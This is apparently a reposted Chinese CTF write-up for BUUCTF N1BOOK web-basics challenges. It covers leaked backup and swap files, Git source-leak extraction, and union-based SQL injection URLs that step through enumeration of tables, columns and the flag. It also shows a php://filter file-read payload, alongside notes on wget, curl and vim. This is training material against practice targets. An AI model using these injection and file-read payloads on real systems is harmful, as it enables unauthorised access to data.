BUUCTF N1BOOK配套題目


今天上線BUUOJ的時候發現多了一欄N1BOOK。

持續更新中~

[第一章 web入門]常見的搜集

掃一下

image-20201109202747757

發現存在robots.txt,index.php~,.index.php.swp三個文件,分別存放了flag的3個部分

  • robots.txt:告訴爬蟲哪些頁面可以爬取
  • index.php~:php的備份有兩種:*.php~*.php.bak
  • .index.php.swp:當vim出現異常會產生.swp文件,可以通過vim -r .index.php.swp恢復文件

linux操作

這邊也順便記錄下linux下的一些操作

  • 在linux下,.開頭的文件是隱藏文件,需要ls -a可以查看
  • rm -f刪除文件(force的意思)不提示任何信息直接刪除
  • wget命令從url下載文件
wget http://80ac1284-dfea-405f-a858-594f5fa545dd.node3.buuoj.cn/.index.php.swp
  • curl命令
curl -O http://80ac1284-dfea-405f-a858-594f5fa545dd.node3.buuoj.cn/.index.php.swp

-o

-o參數將服務器的回應保存成文件,等同於wget命令。

curl -o example.html https://www.example.com

上面命令將www.example.com保存成example.html

-O

-O參數將服務器回應保存成文件,並將 URL 的最后部分當作文件名。

curl -O https://www.example.com/foo/bar.html

上面命令將服務器回應保存成文件,文件名為bar.html

  • vim常用指令

    常用退出命令

先ESC跳到命令模式
然后
:w(保存文件不退出)
:w!(強制保存不退出)
:wq(保存並退出)
:wq!(強制保存並退出)
:q(不保存退出)
:q!(不保存強制退出)
:e!(放棄修改,從上次保存文件開始再編輯)

​ 常用插入命令

i 在當前位置生前插入
I 在當前行首插入
a 在當前位置后插入
A 在當前行尾插入
o 在當前行之后插入一行
O 在當前行之前插入一行

​ 常用查找命令

/flag 回車后查找flag,按n鍵查找下一個

[第一章 web入門]粗心的小李

沒什么好說的,Git源碼泄露

python2.7 git_extract.py http://209e0d28-4b4b-472c-83a7-5c44b973cb2a.node3.buuoj.cn/.git/

源碼里index.html找到flag

[第一章 web入門]SQL注入-1

存在字符型注入

用union select測試哪一列有回顯

http://b61be5db-58bd-4c59-8575-cc599c50610f.node3.buuoj.cn/index.php?id=-1%27%20union%20select%201,2,3--+

image-20201110142135183

開始注入

查表名
http://b61be5db-58bd-4c59-8575-cc599c50610f.node3.buuoj.cn/index.php?id=-1%27%20union%20select%201,group_concat(table_name),1%20from%20information_schema.tables%20where%20table_schema=database()--+

查列名
http://b61be5db-58bd-4c59-8575-cc599c50610f.node3.buuoj.cn/index.php?id=-1%27%20union%20select%201,group_concat(column_name),1%20from%20information_schema.columns%20where%20table_name=%27fl4g%27--+

查flag
http://b61be5db-58bd-4c59-8575-cc599c50610f.node3.buuoj.cn/index.php?id=-1%27%20union%20select%201,fllllag,1%20from%20fl4g--+

[第一章 web入門]afr_1

偽協議讀取

http://04e270ee-476a-49d2-8aa4-6f9e49ce90ef.node3.buuoj.cn/?p=php://filter/read=convert.base64-encode/resource=flag

image-20201130105316693

base64解碼得到flag

image-20201130105348282


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM